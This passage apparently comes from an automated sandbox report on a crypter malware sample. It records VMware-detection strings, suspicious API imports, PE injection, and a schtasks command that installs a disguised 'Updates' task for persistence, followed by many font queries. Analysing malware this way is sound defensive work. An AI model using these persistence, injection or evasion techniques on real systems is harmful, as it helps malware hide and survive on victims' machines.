              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92219
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeThread delayed: delay time: 92109
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_06925D08 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csReference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeMemory written: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
